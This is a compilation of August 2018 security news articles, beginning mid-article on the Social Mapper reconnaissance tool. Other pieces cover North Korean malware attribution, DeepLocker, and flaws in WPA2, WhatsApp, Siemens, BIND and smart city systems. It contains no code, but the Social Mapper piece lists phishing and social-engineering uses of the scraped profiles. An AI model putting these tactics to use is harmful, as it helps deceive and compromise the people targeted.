This stage can be time-consuming, the search could take over 15 hours for lists of 1,000 people and use a significant amount of bandwidth, for this reason, experts recommend running the tool overnight on a machine with a good internet connection.

Stage 3—The Social Mapper starts generating a variety of output, including a CSV file with links to the profile pages of the target list and a visual HTML report.

Of course, this intelligence-gathering tool could be abused by attackers to collect information to use in highly sophisticated spear- phishing campaigns.

Experts from Trustwave warn of potential abuses of Social Mapper that are limited “only by your imagination.” Attackers can use the results obtained with the tool to:

Create fake social media profiles to ‘friend’ the targets and send them links to credential capturing landing pages or downloadable malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
View target photos looking for employee access card badges and familiarise yourself with building interiors.
If you want to start using the tool you can find it for free on GitHub.

Trustwave researcher Jacob Wilkin will present Social Mapper at the Black Hat USA conference today.

Researchers Say Code Reuse Links North Korea's Malware

10.8.2018 securityweek Virus

Following trails of reused code, security researchers at Intezer and McAfee have uncovered new links between malware families attributed to North Korean threat groups and tracked most of the samples to the infamous Lazarus Group.

Code reuse isn’t novel, and many cases where cybercriminals and threat actors employed this technique have been already reported on. In fact, actors operating from the same country have been often observed sharing malware code and infrastructure, which often makes attribution highly problematic.

For security researchers, the reuse of code between different malware families and variations and between one campaign to another means that they can gain insight into the activities of threat actors, and this is exactly what Intezer and McAfee focused on in their recent analysis.

The multiple cyber campaigns attributed to North Korean hackers have been so far focused on two different directions: to raise money or pursue nationalist aims.

Thus there’s a workforce of hackers that focuses on cybercrime activities such as hacking into financial institutions (Unit 180) and another to gather intelligence from other nations and to try to disrupt rival states and military targets (Unit 121).

The researchers focused on the latter and discovered “many overlaps in code reuse,” which led them to the conclusion that nation-state sponsored groups were active in those efforts.

After analyzing thousands of malware samples, many unclassified or uncategorized, the researchers noticed a “significant amount of code similarities between almost every one of the attacks associated with North Korea.”

One similarity was found in the server message block (SMB) module of WannaCry (2017), Mydoom (2009), Joanap, and DeltaAlfa.

The use of these malware families has been already attributed to the Lazarus Group, which is tracked by the U.S. government as Hidden Cobra.

Believed to have orchestrated the $81 million heist from the Bangladesh bank, and seen as the most serious threat to banks, the group is also said to have launched campaigns such as Operation Blockbuster, Dark Seoul, and Operation Troy.

The researchers also noticed a similarity between three different remote access Trojans, namely NavRAT, Gold Dragon, and a DLL from the South Korean gambling hacking campaign, all three believed to be affiliated with Group 123 (also tracked as Reaper, APT37, and ScarCruft).

There’s also a connection between the Brambul malware (2009) and KorDllBot (2011), based on code responsible for launching a cmd.exe with a net share. Both malware families are attributed to Lazarus.

The security researchers also discovered a connection between the Tapaoux (or DarkHotel) malware family and samples from Operation Troy.

The code reuse and sharing between various threat groups known to be affiliated with North Korea has revealed that most malware families link back to Lazarus. The only malware that stands apart are the RATs attributed to Group 123, which are linked to one another.

“The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns,” the security researchers note.

On Thursday, the U.S. Department of Homeland Security (DHS) warned of a new malware variant dubbed KEYMARBLE, which the U.S. government has attributed to malicious cyber activity by the North Korean government. DHS says the malware is a Remote Access Trojan (RAT) capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screenshots, and exfiltrating data. More details on KEYMARBLE are available from the malware report (AR18-221A) from the DHS.

Security expert discovered a bug that affects million Kaspersky VPN users
10.8.2018 securityaffairs

A security issue exists in Kaspersky VPN <=v1.4.0.216 which leaks your DNS Address even after you’re connected to any virtual server. (Tested on Android 8.1.0)
What is a DNS leaks?

In this context, with the term “DNS leak” we indicate an unencrypted DNS query sent by your system OUTSIDE the established VPN tunnel.

Kaspersky VPN is one of the most trusted VPN which comes with 1,000,000+ tier downloads in the official Google Play Store, however, it was observed that when it connects to any random virtual server still leaks your actual DNS address.

The expert Dhiraj Mishra that discovered the flaw reported it to Kaspersky via Hackerone.

Mishra also published a step-by-step guide to reproduce the problem:

Visit IPleak (Note your actual DNS address).
Now, connect to any random virtual server using Kaspersky VPN.
Once you are successfully connected, navigate to IPleak you will observe that the DNS address still remains the same.
Kaspersky VPN

The expert explained that the data leak could threaten the privacy of end-users that want to remain anonymous on the internet.

“I believe this leaks the trace’s of an end user, who wants to remain anonymous on the internet. I reported this vulnerability on Apr 21st (4 months ago) via H1, and a fix was pushed for same but no bounty was awarded.” states Mishra.

The expert reported this vulnerability to Kaspersky on Apr 21st via HackerOne, and a fix was pushed for the issue.

Unfortunately, at the time, the researcher was awarded as expected under the company’s bug bounty.

DeepLocker – AI-powered malware are already among us
10.8.2018 securityaffairs

Security researchers at IBM Research developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker and will present today.
What about Artificial Intelligence (AI) applied in malware development? Threat actors can use AI-powered malware to create powerful malicious codes that can evade sophisticated defenses.
Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI,” dubbed DeepLocker that is able to conceal its malicious intent until it has infected the specific target.

“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.

“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.”

According to the IBM researcher, DeepLocker is able to avoid detection and activate itself only after specific conditions are matched.
AI-powered malware represents a privileged optional in high-targeted attacks like the ones carried out by nation-state actors.
The malicious code could be concealed in harmful applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.
“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.

“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”

deeplocker chart

The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it stealth until the victim is identified through the facial recognition. Experts pointed out that the target can be identified by matching his face with publicly available photos.

“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”

“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The IBM Research group will provider further details today more details in a live demo at the Black Hat USA security conference in Las Vegas.

Researchers Find Flaws in WPA2's 4-way Handshake Implementations
9.8.2018 securityweek

Researchers have discovered several security vulnerabilities in implementations of Wi-Fi Protected Access two (WPA2)’s 4-way handshake, which is used by nearly all protected Wi-Fi networks.

The discovery was the result of simulating cryptographic primitives during symbolic execution for the analysis of security protocol implementations, KU Leuven researchers Mathy Vanhoef and Frank Piessens explain in a recently published whitepaper (PDF).

By applying the technique on three client-side implementations of WPA2’s 4-way handshake, the researchers discovered timing side-channels when verifying authentication tags, a denial-of-service attack, a stack-based buffer overflow, and a non-trivial decryption oracle.

Through symbolic execution, the researchers claim, one aims to exhaustively explore all code paths of a program by running on symbolic inputs instead of concrete ones. For their experiments, the researchers implemented the techniques on top of the KLEE symbolic execution engine (they modified the engine to handle cryptographic primitives).

Of the three tested implementations, two were found susceptible to trivial timing side-channels, because they verify authentication tags using timing-unsafe memory compares.

The researchers found a denial of service in Intel’s iwd daemon (iNet wireless daemon) and a stack-based buffer overflow (in code that processes decrypted data) in MediaTek’s implementation, both of which can be triggered by malicious Access Point (AP). The AES unwrap algorithm was found to be incorrectly implemented in MediaTek’s code.

Furthermore, the wpa supplicant (a cross-platform supplicant with support for WEP, WPA and WPA2 (IEEE 802.11i)) was found vulnerable to a non-trivial decryption oracle caused by processing decrypted but unauthenticated data. Tracked as CVE-2018-14526, the bug can be exploited to recover sensitive information.

“This decryption oracle can be exploited when the victim connects to a WPA2 network using the old TKIP encryption algorithm. It can be abused to decrypt the group key transported in message 3 of the 4-way handshake,” the researchers note.

The attack, however, is only possible if WPA2 is used and if the client selects TKIP as the pairwise cipher, so that the RC4 stream cipher is used to encrypt the key data field (if CCMP is selected, AES is used to protect the key data field). Both conditions are met when the Wi-Fi network uses WPA2 and only supports TKIP (in 2016, 20% of protected Wi-Fi networks used this configuration).

The flaw allows an attacker to decrypt the group key transported in message 3 of WPA2’s 4-way handshake and use it to inject both broadcast and unicast traffic. Furthermore, the key could be used to decrypt unicast and broadcast traffic, the research paper claims.

“We successfully applied symbolic execution to client-side implementations of the 4-way handshake of WPA2, by simulating cryptographic primitives, and constraining parts of the symbolic input to prevent excessive state explosions. This revealed memory corruptions in code that processes decrypted data, uncovered insecure implementations of cryptographic primitives, and even revealed a decryption oracle,” the researchers note.

Earlier this week developers of the popular password cracking tool Hashcat identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.

Flaws in Smart City Systems Can Allow Hackers to Cause Panic
9.8.2018 securityweek

Smart city - Credits: JCT 600 https://www.jct600.co.uk/blog/future-of-motoring/what-will-motoring-look-like-70-years-from-now/

Critical vulnerabilities discovered in smart city systems from several vendors can allow malicious actors to perform various actions that could lead to widespread panic, researchers warn.

The world’s major cities are increasingly reliant on smart technologies, including for traffic management, disaster detection and response, and remotely controlling utilities. These systems communicate via protocols such as 4G, ZigBee and Wi-Fi.

Following the recent accidental false missile alert in Hawaii, experts at Threatcare and IBM X-Force Red have decided to join forces and analyze smart city technologies to see if they are affected by any vulnerabilities that could be exploited to intentionally cause panic.

Researchers from the two companies analyzed products from Echelon, Libelium and Battelle. Their tests led to the discovery of 17 previously unknown vulnerabilities across four types of smart city products, including eight security holes described as “critical” and six as “high severity.”

In the case of Echelon, the companies tested i.LON 100 and 600 routers, which allow organizations to monitor and control LonWorks devices such as pumps, valves, motors, sensors and lights. They also analyzed the vendor’s SmartServer products, described as a “versatile controller, router, and smart energy manager that connects control devices to IP-based applications such as building automation, enterprise energy management, demand response programs, and high-value remote asset management programs.”

A total of five vulnerabilities were discovered in these systems, including two critical flaws that allow authentication bypass, default credentials, plaintext passwords, and the lack of encrypted communications. ICS-CERT recently published an advisory describing some of the issues identified by IBM and Threatcare.

In the case of Libelium, which specializes in hardware for wireless sensor networks, researchers analyzed Meshlium, an IoT gateway designed for connecting sensors to any cloud platform. Four distinct instances of a pre-authentication shell injection flaw were discovered in the product, and they have all been classified as “critical.”

As for Battelle, a global research and development organization, IBM and Threatcare analyzed two versions of its V2I (vehicle-to-infrastructure) Hub product, which is used for communicating data from traffic signal controllers to connected vehicles.

The list of vulnerabilities found in these systems include SQL injection, hardcoded passwords, unprotected sensitive functionality, cross-site scripting (XSS) flaws, and various API-related issues. A majority of these security holes have been assigned either a “critical” or “high severity” rating.

All the affected vendors have been notified and they have addressed the vulnerabilities.

Battelle has clarified that V2I Hub is a 2.5-year project that it’s working on for the Federal Highway Administration. The project is ongoing – it’s expected to be finished at the end of September – and it has only been deployed for testing purposes. Battelle told SecurityWeek that it fixed the flaws found by IBM in early July.

However, the discovery of these basic security holes shows that smart city systems are highly exposed to cyberattacks.

While there is no evidence of malicious attacks exploiting the vulnerabilities found as part of this research project, the companies warned that the risks are significant.

Worryingly, online searches conducted using Shodan and Censys showed that there are tens or hundreds of vulnerable systems accessible directly from the Internet. Some of them have been found to belong to a European country that uses vulnerable devices to detect radiation, and a major U.S. city that relies on them for traffic monitoring.

“According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic,” researchers said.

In a theoretical attack scenario described by the experts, an attacker exploits the vulnerabilities to manipulate data from water level sensors to indicate a flood, which could create panic. In addition, hackers could make the water level appear normal during a flood.

Hackers could also cause mass panic by manipulating data from radiation sensors in order to trigger radiation leak warnings.

Hijacking traffic systems can also have serious consequences. Attackers can cause chaos by controlling traffic signals, and create additional panic by setting off building and emergency alarms, and triggering gunshot sensors.

New G Suite Alerts Provide Visibility Into Suspicious User Activity
9.8.2018 securityweek Security

After bringing alerts on state-sponsored attacks to G Suite last week, Google is now also providing administrators with increased visibility into user behavior to help identify suspicious activity.

Courtesy of newly introduced reports, G Suite administrators can keep an eye on account actions that seem suspicious and can also choose to receive alerts when critical actions are performed.

Admins can set alerts for password changes, and can also receive warnings when users enable or disable two-step verification or when they change account recovery information such as phone number, security questions, and recovery email.

By providing admins with visibility into these actions, Google aims at making it easier to identify suspicious account behavior and detect when user accounts may have been compromised.

Should an admin notice that a user has changed both the password and the password recovery info, which could be a sign that the account has been hijacked, they can leverage the reports to track time and IP address and determine if the change indeed seems suspicious.

Based on the findings, the G Suite administrator could then take the appropriate action to mitigate the issue and restore the user account, such as password reset and disable 2-step verification.

Admins can also use the new reports to gain visibility into an organization's security initiatives, such as the monitoring of domain-wide initiative to increase the adoption of two-step verification.

Access to these reports is available in Admin console > Reports > Audit > Users Accounts.

The new capabilities are set to gradually roll out to all G Suite editions and should become available to all customers within the next two weeks.

“G Suite admins have an important role in protecting their users’ accounts and ensuring their organization’s security. To succeed, they need visibility into user account actions. That’s why we’re adding reports in the G Suite Admin console that surface more information on user account activity,” Google notes.

A Guided Tour of the Asian Dark Web
9.8.2018 securityweek Cyber

Inside the Asian Dark Web - Cybercrime

The Asian dark web is not well known. Most people just think of Russia when thinking about underground hacking forums. To gain a better understanding of Asian onion sites and black markets, researchers from IntSights embarked on a six-month long investigation and analysis.

The results, published this week at Black Hat, show a diverse, culturally sensitive and wider than perhaps expected Asian dark web. Along with the report, IntSights' director of threat research, Itay Kozuch, took SecurityWeek on a guided tour of the Asian dark web.

We started at the Hidden Wiki, a South Korean page that bookmarks other sites in the dark web all over the world. "It's been live for a few years, and is being maintained on a regular basis," explained Kozuch. The page is organized in sections and even provides an 'editor's choice' selection. It provides links to whatever the existing or budding hacker or underworld character might be looking for: bank accounts, card details, advice, drugs, porn, fake passports and IDs, UK driving licenses, firearms and more.

"It's a good place to start a foray into the dark web," said Kozuch. Despite this expansive index onto blacker parts of the dark web, the IntSights report, "At the moment, there are no significant threat actors that operate out of South Korea."

Our next stop was deeper into the dark web: Mushroom, a Chinese black-market site specializing in the sale of drugs. "The most important feature for the researcher," continued Kozuch, "are the prices. They are all in Chinese Yuan, not as we usually see in dark websites, bitcoin or other cryptocurrency." This is because cryptocurrencies are forbidden in China and the site primarily serves Chinese nationals -- although it does offer advice on how to obtain bitcoin and is willing to ship produce outside of China. The price is also 30% to 40% lower than is typically found in western black markets.

From there we moved to Japan. The Japanese dark web has one major difference to other parts: it is remarkably polite. "Many Japanese users view it as an alternate universe," says the report, "where they can express themselves and have harmless discussions, just behind the mask of an anonymous avatar. It is not uncommon to see diaries and blogs on the Japanese dark web." It is more about obtaining things, such as drugs and porn, than about facilitating hacking. One even asks the visitor to suggest a price for the products.

We visited the Japanese branch of Anonymous, which is a bit of an exception. "Its primary purpose is protest against the Japanese government on environmental issues," explained Kozuch. Two current ops are Hope Japan and Hope Fukushima. "Anonymous accuses the Japanese government of hiding information about what really happened in the nuclear plant, and the extent of pollution in the seas around Japan." The website directly calls for attacks against Japanese government websites, and Anonymous is willing to provide what is necessary -- methodologies for DDoS, SQLi, XSS and other attack vectors.

We then visited another Japanese language site that is a bit different -- a site that buys and sells information, focusing on military intelligence, documents, protocols, science, and technology, "What's really remarkable," added Kozuch, "is that this site is not typically Japanese in flavor. Japanese sites usually handle drugs and porn. After analyzing the style and content, "We came to the conclusion that this is not a Japanese website at all. The Japanese would never be so direct and forthright. We suspect that the people behind it are North Korean, which has its problems with Japan." The report adds that it may be a North Korean (or Chinese) group "that is attempting to gather intelligence for some attack on or operation in Japan)."

We also visited another Anonymous site in Thailand (this one is offering a free database of 30,000 FBI and DHS officers stolen in 2016); and a hacking forum/black market in Indonesia (providing free downloads of malware and exploits).

The main focus, however, was on China, and we visited three more websites. Surprisingly, none of these are onion sites. They are dark sites to anybody outside of China because of the Chinese firewall, but in the clear web to Chinese nationals. The first offers DDoS as a packaged service -- a fairly unique offering selling different options of strength and duration. "The largest offering," Kozuch pointed out, "is for a 500 Gb attack with unlimited connections."

The second, known as QQ, is a hacking forum designed as a combination of different social media platforms and providing communication tools such as QQ groups, QQ forums and private chatrooms.

The last was Hack80, a hacking forum more in line with the better known Russian underground forums. "It offers everything you might find in the traditional Russian hacking forums," said Kozuch: "bitcoin mining tutorials, hacker toolkits, malware and so on. You can ask about and get almost anything -- if you're Chinese, of course. You cannot ask questions or get answers in English." This isn't surprising since the site is in the clear web, and thus only visible to Chinese nationals (IntSights was using a very specific VPN for the research and this tour).

Kozuch believes it is time for the West to take the Chinese dark web more seriously. "We usually like to look at the North Koreans and the Russians as the primary attackers; but I believe that the Chinese offer is more sophisticated with more capability than we have realized. Many of the next threats that we are going to see will come from China."

The fact that so many dark Chinese sites are on the Chinese clear web raises the question of collusion between the hackers and the government. Kozuch does not believe that the existence of hacking sites in the clear web automatically means they are permitted by the government, or that the hackers work for the government. It is perfectly feasible for these sites to hide in plain sight given the size of the Chinese internet.

"I think there is a big element of private cybercrime groups that operate from China that we were simply not aware of," he told SecurityWeek. "It is more comfortable to blame the APT groups we already know about, but I think this research shows how much knowledge and how much capability that private groups have, and how they communicate and what kind of tools they are using."

He suspects that we often automatically blame APT groups simply because the attack comes from China; but the perpetrator may well be an unknown private group. "Usually, APT groups (with the exception of North Korea) are not after money -- they're after intelligence or to steal intellectual property. I believe that in some cases there are Chinese threat actors that we simply aren't aware of." As in Russia, many of the Chinese threat actors will focus on targets outside of China so as not to draw the attention -- and ire -- of the local police.

But this doesn't mean there is no collusion at all between the criminal groups and the Chinese government. "I haven't found any evidence that private groups are sub-contracting for the government," he continued, "but I really believe that it is happening -- like in many other places around the world. Sometimes the government doesn't have all the capabilities it needs, so it uses sub-contractors who will deliver the skills provided the government allows them to continue their own operations outside of China. There are examples of known Chinese hackers that are now running their own security firms. Nobody turns from crime life to become whitehats for no reason and without any consequences. I really believe that there are all kinds of groups that enjoy government protection because they provide services to the government when it needs it. Give and take rules."

"The Asian dark web," concludes the IntSights research, "is relatively small compared to its counterparts in Western countries, such as the United States and Europe. However, this doesn't mean that it poses less of a threat. In fact, due to the laws and political motivations of these countries, the risk to non-Asian companies is significantly higher."

Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018; bringing the total capital raised by the firm to $41.3 million. IntSights was founded in 2015 by Alon Arvatz, Gal Ben David, Guy Nizan.

Flaws in Siemens Tool Put ICS Environments at Risk
9.8.2018 securityweek ICS

Serious vulnerabilities discovered by researchers in Siemens’ TIA Portal for SIMATIC STEP7 and SIMATIC WinCC can be exploited by threat actors for lateral movement and other purposes in ICS environments.

The TIA Portal (Totally Integrated Automation Portal) is a piece of software from Siemens that gives organizations unrestricted access to the company’s automation services.

Researchers at industrial cybersecurity firm Nozomi Networks discovered that the default installation of the TIA Portal is affected by two high severity improper file permission vulnerabilities.

One of them, CVE-2018-11453, allows an attacker with access to the local file system to insert specially crafted files that can cause the TIA Portal to enter a denial-of-service (DoS) condition or allow the hacker to execute arbitrary code. Exploiting the flaw does not require special privileges, but the victim needs to attempt to open the TIA Portal for the exploit to be triggered, Siemens said in its advisory.

Nozomi Co-founder and Chief Technology Officer Moreno Carullo told SecurityWeek that the company sent a proof-of-concept (PoC) to ICS-CERT and Siemens that shows how this security hole can be exploited for code execution.

The second vulnerability, CVE-2018-11454, is related to an improper file permission configuration issue in specific TIA Portal directories.

“[The flaw] may allow an attacker with local privileges in the machine where the software is installed to manipulate the resources inside the misconfigured directories (eg., adding a malicious payload),” Carullo explained. “While a legitimate user uses the software suite to transfer configuration (in a licit way) to the targeted device, using the TIA Portal software, a maliciously-added file would be automatically executed by the remote device.”

Siemens has released updates for SIMATIC STEP7 and SIMATIC WinCC versions 14 and 15 to address the vulnerabilities. For earlier versions, users can prevent exploitation by restricting operating system access to authorized users, and processing GDS files only from trusted sources.

Nozomi believes these types of flaws can pose a significant risk to ICS environments.

“These types of flaws may enable an advanced persistent threat (APT) to be installed in the ICS and act by itself hidden from regular ICS engineers in a plant. So it could be used to build bigger malwares,” Carullo said.

Leaked GitHub API Token Exposed Homebrew Software Repositories
9.8.2018 securityweek Hacking

A GitHub API token leaked from Homebrew’s Jenkins provided a security researcher with access to core Homebrew software repositories (repos).

Around since 2009, Homebrew is a free and open-source software package management system that is integrated with command line and which allows for simple installation of software on macOS machines.

On July 31, 2018, security researcher Eric Holmes discovered that an exposed token provided him with commit access to Homebrew/brew, Homebrew/homebrew-core, and Homebrew/formulae.brew.sh repositories.

With hundreds of thousands of people using Homebrew, the potential impact of the compromise was disastrous. By modifying a highly popular package, such as openssl, the researcher could have pushed the malicious code directly to a large number of users.

“If I were a malicious actor, I could have made a small, likely unnoticed change to the openssl formulae, placing a backdoor on any machine that installed it,” Holmes explained.

The issue, which was addressed the same day that it was discovered, did not result in compromised packages, Homebrew lead maintainer Mike McQuaid reveals.

The exposed token had elevated scopes, but the GitHub Support team has verified that it hasn’t been used to perform any pushes to Homebrew/brew or Homebrew/homebrew-core.

“Within a few hours the credentials had been revoked, replaced and sanitised within Jenkins so they would not be revealed in future. Homebrew/brew and Homebrew/homebrew-core were updated so non-administrators on those repositories cannot push directly to master,” McQuaid says.

He also explains that the team also enforced stronger security by updating most repositories in the Homebrew organization “to require CI checks from a pull request to pass before changes can be pushed to master.”

In addition to enabling branch protection and requiring reviews on additional repositories, the Homebrew team also required all maintainers to review and prune their personal access tokens and disable SMS fallback for 2FA.

“We try our best to behave as a for-profit company would do in terms of timely response to security issues but this is heavily limited by our lack of resources. For example, in this the Homebrew maintainer who resolved the above issues was on paternity leave from work and the primary carer for their child and had to reach a quick resolution while their child had a nap,” McQuaid notes.

In the wake of recent incidents with compromised Gentoo Linux and Arch Linux AUR repositories, it is increasingly clear that malicious actors can cause a great deal of damage by targeting the supply chain. This is exactly what last year’s CCleaner and NotPetya attacks demonstrated as well.

“This is my growing concern, and it’s been proven time and time again that package managers, and credential leaks, are a weak point in the security of the internet, and that supply chain attacks are a real and persistent threat. This is not a weakness in Homebrew, but rather a systemic problem in the industry, and one where we need more security research,” Holmes concludes.

Researchers find vulnerabilities in WhatsApp that allow to spread Fake News via group chats
9.8.2018 securityaffairs

WhatsApp has been found vulnerable to multiple security flaws that could allow malicious users to spread fake news through group chats.
WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security flaws that could allow malicious users to intercept and modify the content of messages sent in both private as well as group conversations.

Researchers at security firm Check Point have discovered several vulnerabilities in the popular instant messaging app Whatsapp, the flaws take advantage of a bug in the security protocols to modify the messages.

An attacker could exploit the flaws “to intercept and manipulate messages sent by those in a group or private conversation” as well as “create and spread misinformation”.

The issues affect the way WhatsApp mobile application communicates with the WhatsApp Web and decrypts the messages using the protobuf2 protocol.

The flaws allow hackers to abuse the ‘quote’ feature in a WhatsApp group conversation to change the identity of the sender, or alter the content of members’ reply to a group chat, or send private messages to one of the group members disguised as a group message.

Experts pointed out the that flaws could not be exploited to access the content of end-to-end encrypted messages and in order to exploit them, the attackers must be already part of group conversations.

“Check Point researchers have discovered a vulnerability in WhatsApp that allows a threat actor to intercept and manipulate messages sent by those in a group or private conversation.” reads the blog post published by the experts.

“The vulnerability so far allows for three possible attacks:

Changing a reply from someone to put words into their mouth that they did not say.
Quoting a message in a reply to a group conversation to make it appear as if it came from a person who is not even part of the group.
Sending a message to a member of a group that pretends to be a group message but is in fact only sent to this member. However, the member’s response will be sent to the entire group.”
The experts demonstrated the exploitation of the flaws by changing a WhatsApp chat entry sent by one member of a group.

Below a video PoC of the attack that shows how to modify WhatsApp Chats and implements the three different attacks.

The research team from CheckPoint researchers (Dikla Barda, Roman Zaikin, and Oded Vanunu) developed a custom extension for the popular tool Burp Suite, dubbed WhatsApp Protocol Decryption Burp Tool, to intercept and modify encrypted messages on their WhatsApp Web.

“By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues.” states the experts.

The extension is available on Github, it requires the attacker to provide its private and public keys.

“The keys can be obtained from the key generation phase from WhatsApp Web before the QR code is generated:” continues the report published by the experts.

“After we take these keys we need to take the “secret” parameter which is sent by the mobile phone to WhatsApp Web while the user scans the QR code:”

Experts demonstrated that using their extension an attacker can:

Change the content of a group member’s reply.
Change the identity of a sender in a group chat. The attack works even if the attacker is not a member of the group. “Use the ‘quote’ feature in a group conversation to change the identity of the sender, even if that person is not a member of the group.”
Send a Private Message in a Group, but when the recipient replies the members of the group will see it.

The experts reported the flaws to WhatsApp, but the company explained that end-to-end encryption if not broken by the attacks.

“We carefully reviewed this issue and it’s the equivalent of altering an email to make it look like something a person never wrote.” WhatsApp said in a statement.

“This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp.”

“These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,” WhatsApp security team replied to the researchers.

Checkpoint experts argue that the flaws could be abused to spread fake news and misinformation, for this reason, it is essential to fix the flaws as soon as possible along with putting limits on the forwarded messages.

GitHub started warning users when adopting compromised credentials
9.8.2018 securityaffairs Incindent

In order to improve the security of its users, the popular software code hosting service GitHub is now alerting account holders whenever it detects that a password has been exposed by data breaches on other services.
Last week the popular software code hosting service GitHub has introduced a new feature to protect its users, it will alert them whenever it detects that a password has been compromised in a third-party data breach.

GitHub has teamed with the HaveIBeenPwned.com service, managed by the cybersecurity expert Troy Hunt, to provide implement a feature that allows users to check whether their credentials have been involved in known data breaches.

“Common password advice is to use a long and unique password for each website you have an account with. It’s challenging to remember a strong and unique password for each website without either using a password manager or using a trivially discovered theme. As a result, password reuse is extremely prevalent. Regardless of the strength of a password, a single breach can nullify its security when used elsewhere.” reads the advisory published by GitHub.

“While Troy hosts a service that people and services can use to check for compromised passwords, he also generously made the approximately 517 million record dataset available for download. Using this data, GitHub created an internal version of this service so that we can validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub has developed service that leverages the 517 million record dataset provided by Huntto “validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub account check

The feature will alert users that are using compromised credentials and ask them to change them during login, registration, or during a password change.

The service will store Github the hashed passwords using the bcrypt algorithm.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” continues GitHub.

GitHub encourages the use of two-factor authentication (2FA), those users that have enabled it will receive periodic warnings to review the 2FA setup and recovery options.

“If you have two-factor authentication enabled, GitHub will now periodically remind you to review your 2FA setup and recovery options. We highly recommend using a 2FA authenticator application that supports cloud backups in the event your phone is lost, stolen, or falls in the ocean.” continues the advisory.

In June, Microsoft announced the acquisition of GitHub for $7.5 billion in Microsoft stock and the hosting service is improving its security by introducing new measures, including the enforcing of SSL/TLS.

Snapchat source Code leaked after an iOS update exposed it
9.8.2018 securityaffairs

Hackers leaked the Snapchat source code on GitHub, after they attempted to contact the company for a reward.
Hackers gained access to the source code of the frontend of Snapchat instant messaging app for iOS and leaked it on GitHub.

A GitHub account associated with a person with the name Khaled Alshehri who claimed to be from Pakistan and goes online with the handle i5xx created the GitHub repository titled Source-Snapchat.

After being notified, Snap Inc., has confirmed the authenticity of the source core and asked GitHub to remove it by filing a DMCA (Digital Millennium Copyright Act) request.

“Please provide a detailed description of the original copyrighted work that has allegedly been infringed. If possible, include a URL to where it is posted online.**”


SnapChat source code

According to Snapchat, the source code was leaked after an iOS update made in May that exposed a “small amount” of the app source code. The problem was solved and Snap Inc ensured that the data leak has no impact on the Snapchat users.

The hackers who leaked the source code are threatening the company of releasing new parts of the leaked code until the Snap Inc will not reply. Likely they are blackmailing the company.SnapChat source code

SnapChat source code

Two members of the group who leaked the Snapchat source code have been posting messages written in Arabic and English on Twitter.

The two hackers are allegedly based in Pakistan and France, they were expecting a bug bounty reward from the company without success.

At the time of writing two other forks containing the source code are still present on GitHub, it seems that the code was published just after the iOS update.

Snapchat currently run an official bug bounty program through HackerOne and has already paid several rewards for critical vulnerabilities in its app.

Flaw in BIND Security Feature Allows DoS Attacks
9.8.2018 securityweek

The Internet Systems Consortium (ISC) revealed on Wednesday that the BIND DNS software is affected by a serious vulnerability that can be exploited for denial-of-service (DoS) attacks.

The flaw, discovered by Tony Finch of the University of Cambridge and tracked as CVE-2018-5740, can be exploited remotely and it has been assigned a CVSS score of 7.5, which makes it “high severity.”

However, the vulnerability only impacts servers on which a feature called “deny-answer-aliases” has been enabled. The feature is disabled by default.

The “deny-answer-aliases” feature is designed to help recursive server operators protect users against DNS rebinding attacks. These types of attacks allow a remote hacker to abuse the targeted user’s web browser to directly communicate with devices on the local network and exploit any flaws they might have.

“Accidental or deliberate triggering of this defect will cause an INSIST assertion failure in named, causing the named process to stop execution and resulting in denial of service to clients,” ISC wrote in its advisory.

The security hole impacts BIND versions 9.7.0 through 9.8.8, 9.9.0 through 9.9.13, 9.10.0 through 9.10.8, 9.11.0 through 9.11.4, 9.12.0 through 9.12.2, and 9.13.0 through 9.13.2. A patch is included in versions 9.9.13-P1, 9.10.8-P1, 9.11.4-P1 and 9.12.2-P1. As a workaround, ISC suggests disabling the problematic feature if it has been used.

“Most operators will not need to make any changes unless they are using the ‘deny-answer-aliases’ feature. ‘deny-answer-aliases’ is off by default; only configurations which explicitly enable it can be affected by this defect,” ISC said.

